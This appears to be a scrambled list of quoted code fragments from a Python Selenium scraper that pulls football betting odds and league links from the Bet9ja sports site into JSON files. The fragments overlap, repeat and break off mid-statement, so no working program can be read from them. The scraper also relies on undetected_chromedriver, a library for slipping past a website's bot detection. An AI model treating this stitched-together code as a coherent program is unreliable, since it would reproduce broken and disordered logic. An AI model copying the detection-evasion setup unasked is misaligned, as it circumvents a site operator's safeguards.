"= -1 # Get index soup = BeautifulSoup(Browser.page_source, 'html5lib') box = len(soup.find_all('td', 'grid-table__td'))",
"for e in data: for a in data[e]['submenu']: u = e.lower().replace(',', '').replace(' ',",
"'r') as json_file: global data data = json.load(json_file) for e in data: #",
"5 seconds time.sleep(5) # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") elem = soup.select('.sports-table",
"# Get index soup = BeautifulSoup(Browser.page_source, 'html5lib') box = len(soup.find_all('td', 'grid-table__td')) for i",
"info_2['match'] = home_team + ' vs ' + away_team info_1['time'] = each.find('span').get_text().strip() info_2['time']",
"uc from selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions",
"> .table-f') for each in elem: # Compile info = {} home_team =",
"link for each in data: l = data[each]['location'] Browser.find_element(By.ID, l).click() # Parse HtmlDoc",
"soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'GG/NG': index = i break # Activate GGNG if index",
"\"accordion-text\").get_text().strip() id = div.find(\"div\", \"accordion-toggle\")['id'] data[title] = {} data[title]['location'] = id # fetch",
"or 0 info_2['2X'] = each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip() or 0 # Upload s_odds.append(info_1) d_odds.append(info_2)",
"range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # # Wait 5 seconds time.sleep(5) # Parse",
"prefix p = bet9ja + 'competition/soccer/' # link Object links = {} #",
"\"html5lib\") # Fetch Menu for div in soup.select(\".accordion > .accordion-item\")[0]: upper = div.select(\".accordion-inner",
"Scroll the page height = int(Browser.execute_script( 'return document.body.scrollHeight')) for i in range(1, height,",
"'accordion-item'))) # Activate Menu Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click() Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click() # Parse HtmlDoc soup =",
"Browser.quit() # Double Chance and Single Chance def DS_chance(): # Odds s_odds =",
"Get index soup = BeautifulSoup(Browser.page_source, 'html5lib') box = len(soup.find_all('td', 'grid-table__td')) for i in",
"undetected_chromedriver.v2 as uc from selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support",
"= each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info_1['away'] = each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip() or 0",
"or 0 info_1['away'] = each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip() or 0 info_2['1X'] = each.find_all( 'li',",
"= p + u + v + w # Gather links links[a['title']] =",
"= fl # Save links with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile: json.dump(links, outfile, indent=4)",
"# Gather links links[a['title']] = fl # Save links with open('./Bet9ja/bet9ja_links.txt', 'w') as",
"== 'DNB': index = i break # Activate DNB if index > -1:",
"'r') as json_file: global data data = json.load(json_file) for e in data: for",
"each.find( 'div', 'sports-table__away').get_text().strip() info['category'] = e info['match'] = home_team + ' vs '",
"home_team + ' vs ' + away_team info_1['time'] = each.find('span').get_text().strip() info_2['time'] = each.find('span').get_text().strip()",
"Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5) # Index of target index =",
"e.append(f) data[each]['submenu'] = e # Save as JSON with open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile:",
"Menu def getMenu(): # Object data = {} # Initialise Browser Browser.get(bet9ja) #",
"= {} f['title'] = t['title'] f['id'] = re.sub('[a-zA-Z_,]', '', t['id']) e.append(f) data[each]['submenu'] =",
"{} info_2 = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div',",
"for each in elem: # Compile info_1 = {} info_2 = {} home_team",
"= e info['match'] = home_team + ' vs ' + away_team info['time'] =",
"Dependencies # ============================================================================================================= import undetected_chromedriver.v2 as uc from selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.support.ui",
"index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds time.sleep(5) # Scroll the",
"= [] d_odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file:",
"= e.lower().replace(',', '').replace(' ', '') + '/' v = a['title'].lower().replace(',', '').replace(' ', '')",
"info_2['1X'] = each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip() or 0 info_2['2X'] = each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip() or",
"div.find(\"div\", \"accordion-toggle\")['id'] data[title] = {} data[title]['location'] = id # fetch Submenu and Menu",
"uc.ChromeOptions() BrowserMode.headless = False BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\") Browser = uc.Chrome(options=BrowserMode) actions = ActionChains(Browser) #",
"a['id'].lower()[1:] # full link fl = p + u + v + w",
"'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info_1['category'] = e info_2['category'] = e info_1['match']",
"# Initiate Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5) # Index of target",
"# Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile: json.dump(odds, outfile,",
"# Compile info = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find(",
"0 info_2['2X'] = each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip() or 0 # Upload s_odds.append(info_1) d_odds.append(info_2) with",
"ActionChains from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by",
"div.select(\".accordion-inner > .accordion-item\") for div in upper: title = div.find(\"div\", \"accordion-text\").get_text().strip() id =",
"each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info_1['away'] = each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip() or 0 info_2['1X']",
"= BeautifulSoup(Browser.page_source, \"html5lib\") elem = soup.select('.sports-table > .table-f') for each in elem: #",
"# Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") elem",
"= [] for t in d: f = {} f['title'] = t['title'] f['id']",
"each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_GGNG.txt',",
"seconds time.sleep(5) # Index of target index = -1 # Get index soup",
"ActionChains(Browser) # Websites # ============================================================================================================= bet9ja = \"https://sports.bet9ja.com/\" # Functions # ============================================================================================================= #",
"continue with open('./Bet9ja/bet9ja_GGNG.txt', 'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit() # Double Chance",
"soup = BeautifulSoup(Browser.page_source, 'html5lib') box = len(soup.find_all('td', 'grid-table__td')) for i in range(box): if",
"= each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info['category'] = e info['match']",
"away_team info['time'] = each.find('span').get_text().strip() info['GG'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['NG'] =",
"Odds odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global",
"# GGNG def GGNG(): # Odds odds = [] # fetch links with",
"# fetch menu with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file: global data data = json.load(json_file)",
"= home_team + ' vs ' + away_team info_2['match'] = home_team + '",
"import undetected_chromedriver.v2 as uc from selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.support.ui import WebDriverWait from",
"Bet9ja Odds # ====================================================================================== # DNB def DNB(): # Odds odds = []",
"Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") elem = soup.select('.sports-table > .table-f') for each",
"and Menu link for each in data: l = data[each]['location'] Browser.find_element(By.ID, l).click() #",
"-1 # Get index soup = BeautifulSoup(Browser.page_source, 'html5lib') box = len(soup.find_all('td', 'grid-table__td')) for",
"False BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\") Browser = uc.Chrome(options=BrowserMode) actions = ActionChains(Browser) # Websites # =============================================================================================================",
"web prefix p = bet9ja + 'competition/soccer/' # link Object links = {}",
"json.dump(odds, outfile, indent=4) Browser.quit() # Double Chance and Single Chance def DS_chance(): #",
"seconds time.sleep(5) # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") elem = soup.select('.sports-table >",
"Websites # ============================================================================================================= bet9ja = \"https://sports.bet9ja.com/\" # Functions # ============================================================================================================= # Bet9ja Menu",
"each.find('span').get_text().strip() info_2['time'] = each.find('span').get_text().strip() info_1['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info_1['away'] =",
"box = len(soup.find_all('td', 'grid-table__td')) for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB':",
"+ ' vs ' + away_team info['time'] = each.find('span').get_text().strip() info['home'] = each.find_all( 'li',",
"vs ' + away_team info_1['time'] = each.find('span').get_text().strip() info_2['time'] = each.find('span').get_text().strip() info_1['home'] = each.find_all(",
"or 0 info['NG'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else:",
"= json.load(json_file) for e in data: for a in data[e]['submenu']: u = e.lower().replace(',',",
"\"html5lib\") d = soup.find_all('a', 'side-nav-league__link') e = [] for t in d: f",
"info_1['time'] = each.find('span').get_text().strip() info_2['time'] = each.find('span').get_text().strip() info_1['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0",
"Double Chance and Single Chance def DS_chance(): # Odds s_odds = [] d_odds",
"open('./Bet9ja/bet9ja_Double.txt', 'w') as outfile: json.dump(d_odds, outfile, indent=4) Browser.quit() # getMenu() # getLinks_Bet9ja() DS_chance()",
"# link Object links = {} # fetch menu with open('./Bet9ja/bet9ja_menu.txt', 'r') as",
"# Bet9ja Menu def getMenu(): # Object data = {} # Initialise Browser",
"WebDriverWait(Browser, 60).until( EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item'))) # Activate Menu Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click() Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click() # Parse",
"0 info_2['1X'] = each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip() or 0 info_2['2X'] = each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip()",
"'sports-table__away').get_text().strip() info_1['category'] = e info_2['category'] = e info_1['match'] = home_team + ' vs",
"from selenium.webdriver.common.by import By from bs4 import BeautifulSoup import time import json import",
"Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds time.sleep(5) # Scroll the page height =",
"import json import re from pathlib import Path # Browser Configurations # =============================================================================================================",
"each.find( 'div', 'sports-table__away').get_text().strip() info_1['category'] = e info_2['category'] = e info_1['match'] = home_team +",
"as JSON with open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile: json.dump(data, outfile, indent=4) Browser.quit() # Bet9ja",
"= each.find('span').get_text().strip() info['GG'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['NG'] = each.find_all( 'li',",
"data: # Initiate Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5) # Scroll the",
"Browser Browser.get(bet9ja) # Wait WebDriverWait(Browser, 60).until( EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item'))) # Activate Menu Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click()",
"'') + '/' v = a['title'].lower().replace(',', '').replace(' ', '') + '/' w =",
"'div', 'sports-table__away').get_text().strip() info_1['category'] = e info_2['category'] = e info_1['match'] = home_team + '",
"each in elem: # Compile info = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip()",
"'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info['category'] = e info['match'] = home_team +",
"selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC",
"for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # # Wait 5 seconds",
"GGNG(): # Odds odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as",
"getMenu(): # Object data = {} # Initialise Browser Browser.get(bet9ja) # Wait WebDriverWait(Browser,",
"in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB': index = i break # Activate",
"soup.find_all('a', 'side-nav-league__link') e = [] for t in d: f = {} f['title']",
"Initiate Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5) # Index of target index",
"the page height = int(Browser.execute_script( 'return document.body.scrollHeight')) for i in range(1, height, 10):",
"' + away_team info['time'] = each.find('span').get_text().strip() info['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0",
"index soup = BeautifulSoup(Browser.page_source, 'html5lib') box = len(soup.find_all('td', 'grid-table__td')) for i in range(box):",
"Gather links links[a['title']] = fl # Save links with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile:",
"range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait 5 seconds time.sleep(5) # Parse HtmlDoc",
"e info['match'] = home_team + ' vs ' + away_team info['time'] = each.find('span').get_text().strip()",
"+ ' vs ' + away_team info['time'] = each.find('span').get_text().strip() info['GG'] = each.find_all( 'li',",
"= soup.select('.sports-table > .table-f') for each in elem: # Compile info_1 = {}",
"info_1 = {} info_2 = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team =",
"10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup =",
"', '') + '/' w = a['id'].lower()[1:] # full link fl = p",
"continue with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit() # GGNG def",
"= {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info['category']",
"\"accordion-toggle\")['id'] data[title] = {} data[title]['location'] = id # fetch Submenu and Menu link",
"else: pass continue with open('./Bet9ja/bet9ja_GGNG.txt', 'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit() #",
"Path # Browser Configurations # ============================================================================================================= BrowserMode = uc.ChromeOptions() BrowserMode.headless = False BrowserMode.add_argument('--user-data-dir=./chrome_profile/')",
"= each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['NG'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0",
"Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile: json.dump(odds, outfile, indent=4)",
"selenium.webdriver.common.by import By from bs4 import BeautifulSoup import time import json import re",
"0 # Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile: json.dump(odds,",
"# Odds s_odds = [] d_odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt',",
"'sports-table__odds-item')[0].get_text().strip() or 0 info_1['away'] = each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip() or 0 info_2['1X'] = each.find_all(",
"info_1['match'] = home_team + ' vs ' + away_team info_2['match'] = home_team +",
"# Object data = {} # Initialise Browser Browser.get(bet9ja) # Wait WebDriverWait(Browser, 60).until(",
"away_team = each.find( 'div', 'sports-table__away').get_text().strip() info['category'] = e info['match'] = home_team + '",
"document.body.scrollHeight')) for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait 5 seconds",
"Compile info = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div',",
"WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from bs4",
"= {} # Initialise Browser Browser.get(bet9ja) # Wait WebDriverWait(Browser, 60).until( EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item'))) #",
"{} data[title]['location'] = id # fetch Submenu and Menu link for each in",
"indent=4) Browser.quit() # Bet9ja links def getLinks_Bet9ja(): # web prefix p = bet9ja",
"'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit() # GGNG def GGNG(): # Odds",
"= home_team + ' vs ' + away_team info['time'] = each.find('span').get_text().strip() info['home'] =",
"info['NG'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else: pass continue",
"or 0 info_2['1X'] = each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip() or 0 info_2['2X'] = each.find_all( 'li',",
"def getMenu(): # Object data = {} # Initialise Browser Browser.get(bet9ja) # Wait",
"' vs ' + away_team info_2['match'] = home_team + ' vs ' +",
"'', t['id']) e.append(f) data[each]['submenu'] = e # Save as JSON with open('./Bet9ja/bet9ja_menu.txt', 'w')",
"s_odds.append(info_1) d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile: json.dump(s_odds, outfile, indent=4) with open('./Bet9ja/bet9ja_Double.txt', 'w')",
"'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['NG'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload",
"Bet9ja Menu def getMenu(): # Object data = {} # Initialise Browser Browser.get(bet9ja)",
"v = a['title'].lower().replace(',', '').replace(' ', '') + '/' w = a['id'].lower()[1:] # full",
"for div in upper: title = div.find(\"div\", \"accordion-text\").get_text().strip() id = div.find(\"div\", \"accordion-toggle\")['id'] data[title]",
"odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global data",
"# fetch Submenu and Menu link for each in data: l = data[each]['location']",
"def DNB(): # Odds odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r')",
"f = {} f['title'] = t['title'] f['id'] = re.sub('[a-zA-Z_,]', '', t['id']) e.append(f) data[each]['submenu']",
"'DNB': index = i break # Activate DNB if index > -1: Browser.find_elements(By.CLASS_NAME,",
"'competition/soccer/' # link Object links = {} # fetch menu with open('./Bet9ja/bet9ja_menu.txt', 'r')",
"import BeautifulSoup import time import json import re from pathlib import Path #",
"in d: f = {} f['title'] = t['title'] f['id'] = re.sub('[a-zA-Z_,]', '', t['id'])",
"# Wait 5 seconds time.sleep(5) # Scroll the page height = int(Browser.execute_script( 'return",
"each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info['category'] = e info['match'] =",
"# Dependencies # ============================================================================================================= import undetected_chromedriver.v2 as uc from selenium.webdriver.common.action_chains import ActionChains from",
"outfile: json.dump(links, outfile, indent=4) Browser.quit() # Bet9ja Odds # ====================================================================================== # DNB def",
"for div in soup.select(\".accordion > .accordion-item\")[0]: upper = div.select(\".accordion-inner > .accordion-item\") for div",
"# Websites # ============================================================================================================= bet9ja = \"https://sports.bet9ja.com/\" # Functions # ============================================================================================================= # Bet9ja",
"i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait 5 seconds time.sleep(5) #",
"= e info_2['category'] = e info_1['match'] = home_team + ' vs ' +",
"f['id'] = re.sub('[a-zA-Z_,]', '', t['id']) e.append(f) data[each]['submenu'] = e # Save as JSON",
"# # Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\")",
"json_file: global data data = json.load(json_file) for e in data: # Initiate Browser",
"d: f = {} f['title'] = t['title'] f['id'] = re.sub('[a-zA-Z_,]', '', t['id']) e.append(f)",
"t['title'] f['id'] = re.sub('[a-zA-Z_,]', '', t['id']) e.append(f) data[each]['submenu'] = e # Save as",
"import Path # Browser Configurations # ============================================================================================================= BrowserMode = uc.ChromeOptions() BrowserMode.headless = False",
"d = soup.find_all('a', 'side-nav-league__link') e = [] for t in d: f =",
"else: pass continue with open('./Bet9ja/bet9ja_DNB.txt', 'w') as outfile: json.dump(odds, outfile, indent=4) Browser.quit() #",
"data[title]['location'] = id # fetch Submenu and Menu link for each in data:",
"'grid-table__td')) for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB': index = i",
"Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click() Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch",
"data[title] = {} data[title]['location'] = id # fetch Submenu and Menu link for",
"BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch Menu for div in soup.select(\".accordion > .accordion-item\")[0]: upper =",
"info_2 = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip()",
"time import json import re from pathlib import Path # Browser Configurations #",
"open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile: json.dump(data, outfile, indent=4) Browser.quit() # Bet9ja links def getLinks_Bet9ja():",
"for e in data: # Initiate Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5)",
"home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info_1['category'] = e",
"index = -1 # Get index soup = BeautifulSoup(Browser.page_source, 'html5lib') box = len(soup.find_all('td',",
"'/' w = a['id'].lower()[1:] # full link fl = p + u +",
"page height = int(Browser.execute_script( 'return document.body.scrollHeight')) for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0,",
"info['away'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else: pass continue",
"with open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile: json.dump(data, outfile, indent=4) Browser.quit() # Bet9ja links def",
"data data = json.load(json_file) for e in data: # Initiate Browser Browser.get(data[e]) #",
"v + w # Gather links links[a['title']] = fl # Save links with",
"# fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global data data = json.load(json_file)",
".table-f') for each in elem: # Compile info = {} home_team = each.find(",
"global data data = json.load(json_file) for e in data: for a in data[e]['submenu']:",
"data[each]['location'] Browser.find_element(By.ID, l).click() # Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") d = soup.find_all('a',",
"soup.select('.sports-table > .table-f') for each in elem: # Compile info = {} home_team",
"each in elem: # Compile info_1 = {} info_2 = {} home_team =",
"\"html5lib\") elem = soup.select('.sports-table > .table-f') for each in elem: # Compile info",
"links[a['title']] = fl # Save links with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile: json.dump(links, outfile,",
"d_odds = [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global data",
"'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_DNB.txt', 'w') as",
"from pathlib import Path # Browser Configurations # ============================================================================================================= BrowserMode = uc.ChromeOptions() BrowserMode.headless",
"# Save as JSON with open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile: json.dump(data, outfile, indent=4) Browser.quit()",
"u + v + w # Gather links links[a['title']] = fl # Save",
"div in upper: title = div.find(\"div\", \"accordion-text\").get_text().strip() id = div.find(\"div\", \"accordion-toggle\")['id'] data[title] =",
"# Double Chance and Single Chance def DS_chance(): # Odds s_odds = []",
"# Upload s_odds.append(info_1) d_odds.append(info_2) with open('./Bet9ja/bet9ja_Single.txt', 'w') as outfile: json.dump(s_odds, outfile, indent=4) with",
"# Bet9ja links def getLinks_Bet9ja(): # web prefix p = bet9ja + 'competition/soccer/'",
"json.dump(links, outfile, indent=4) Browser.quit() # Bet9ja Odds # ====================================================================================== # DNB def DNB():",
"'li', 'sports-table__odds-item')[1].get_text().strip() or 0 # Upload odds.append(info) else: pass continue with open('./Bet9ja/bet9ja_GGNG.txt', 'w')",
"outfile, indent=4) Browser.quit() # Double Chance and Single Chance def DS_chance(): # Odds",
"# ============================================================================================================= bet9ja = \"https://sports.bet9ja.com/\" # Functions # ============================================================================================================= # Bet9ja Menu def",
"info_1['away'] = each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip() or 0 info_2['1X'] = each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip() or",
"= BeautifulSoup(Browser.page_source, \"html5lib\") d = soup.find_all('a', 'side-nav-league__link') e = [] for t in",
"json.load(json_file) for e in data: # Initiate Browser Browser.get(data[e]) # Wait 5 seconds",
"len(soup.find_all('td', 'grid-table__td')) for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip() == 'DNB': index =",
"' + away_team info['time'] = each.find('span').get_text().strip() info['GG'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0",
"info_2['time'] = each.find('span').get_text().strip() info_1['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info_1['away'] = each.find_all(",
"Save as JSON with open('./Bet9ja/bet9ja_menu.txt', 'w') as outfile: json.dump(data, outfile, indent=4) Browser.quit() #",
"-1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds time.sleep(5) # Scroll the page height",
"data: # Initiate Browser Browser.get(data[e]) # Wait 5 seconds time.sleep(5) # Index of",
"each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info['away'] = each.find_all( 'li', 'sports-table__odds-item')[1].get_text().strip() or 0 #",
"Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # # Wait 5 seconds time.sleep(5) # Parse HtmlDoc soup =",
"Wait WebDriverWait(Browser, 60).until( EC.presence_of_element_located((By.CLASS_NAME, 'accordion-item'))) # Activate Menu Browser.find_elements(By.CLASS_NAME, \"accordion-item\")[0].click() Browser.find_element(By.ID, \"left_prematch_sport-1_soccer_labelmore-toggle\").click() #",
"# Compile info_1 = {} info_2 = {} home_team = each.find( 'div', 'sports-table__home').get_text().strip()",
"each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info_1['category'] = e info_2['category'] =",
"+ away_team info_2['match'] = home_team + ' vs ' + away_team info_1['time'] =",
"= [] # fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global data data",
"= {} home_team = each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info_1['category']",
"div in soup.select(\".accordion > .accordion-item\")[0]: upper = div.select(\".accordion-inner > .accordion-item\") for div in",
"# Parse HtmlDoc soup = BeautifulSoup(Browser.page_source, \"html5lib\") d = soup.find_all('a', 'side-nav-league__link') e =",
"= home_team + ' vs ' + away_team info['time'] = each.find('span').get_text().strip() info['GG'] =",
"of target index = -1 # Get index soup = BeautifulSoup(Browser.page_source, 'html5lib') box",
"for i in range(1, height, 10): Browser.execute_script(\"window.scrollTo(0, {});\".format(i)) # Wait 5 seconds time.sleep(5)",
"BeautifulSoup(Browser.page_source, 'html5lib') box = len(soup.find_all('td', 'grid-table__td')) for i in range(box): if soup.find_all('td', 'grid-table__td')[i].get_text().strip()",
"json.load(json_file) for e in data: for a in data[e]['submenu']: u = e.lower().replace(',', '').replace('",
"soup = BeautifulSoup(Browser.page_source, \"html5lib\") # Fetch Menu for div in soup.select(\".accordion > .accordion-item\")[0]:",
"fetch links with open('./Bet9ja/bet9ja_links.txt', 'r') as json_file: global data data = json.load(json_file) for",
"= uc.Chrome(options=BrowserMode) actions = ActionChains(Browser) # Websites # ============================================================================================================= bet9ja = \"https://sports.bet9ja.com/\" #",
"menu with open('./Bet9ja/bet9ja_menu.txt', 'r') as json_file: global data data = json.load(json_file) for e",
"pathlib import Path # Browser Configurations # ============================================================================================================= BrowserMode = uc.ChromeOptions() BrowserMode.headless =",
"+ away_team info_1['time'] = each.find('span').get_text().strip() info_2['time'] = each.find('span').get_text().strip() info_1['home'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip()",
"# Fetch Menu for div in soup.select(\".accordion > .accordion-item\")[0]: upper = div.select(\".accordion-inner >",
"DNB if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click() # Wait 5 seconds time.sleep(5) #",
"'sports-table__odds-item')[2].get_text().strip() or 0 info_2['1X'] = each.find_all( 'li', 'sports-table__odds-item')[3].get_text().strip() or 0 info_2['2X'] = each.find_all(",
"Save links with open('./Bet9ja/bet9ja_links.txt', 'w') as outfile: json.dump(links, outfile, indent=4) Browser.quit() # Bet9ja",
"= False BrowserMode.add_argument('--user-data-dir=./chrome_profile/') BrowserMode.add_argument(\"--start-maximized\") Browser = uc.Chrome(options=BrowserMode) actions = ActionChains(Browser) # Websites #",
"EC from selenium.webdriver.common.by import By from bs4 import BeautifulSoup import time import json",
"Submenu and Menu link for each in data: l = data[each]['location'] Browser.find_element(By.ID, l).click()",
"'li', 'sports-table__odds-item')[3].get_text().strip() or 0 info_2['2X'] = each.find_all( 'li', 'sports-table__odds-item')[5].get_text().strip() or 0 # Upload",
"index = i break # Activate GGNG if index > -1: Browser.find_elements(By.CLASS_NAME, 'grid-table__td')[index].click()",
"'li', 'sports-table__odds-item')[0].get_text().strip() or 0 info_1['away'] = each.find_all( 'li', 'sports-table__odds-item')[2].get_text().strip() or 0 info_2['1X'] =",
"' vs ' + away_team info['time'] = each.find('span').get_text().strip() info['GG'] = each.find_all( 'li', 'sports-table__odds-item')[0].get_text().strip()",
"= div.select(\".accordion-inner > .accordion-item\") for div in upper: title = div.find(\"div\", \"accordion-text\").get_text().strip() id",
"'').replace(' ', '') + '/' w = a['id'].lower()[1:] # full link fl =",
"title = div.find(\"div\", \"accordion-text\").get_text().strip() id = div.find(\"div\", \"accordion-toggle\")['id'] data[title] = {} data[title]['location'] =",
"DS_chance(): # Odds s_odds = [] d_odds = [] # fetch links with",
"= each.find( 'div', 'sports-table__home').get_text().strip() away_team = each.find( 'div', 'sports-table__away').get_text().strip() info_1['category'] = e info_2['category']",
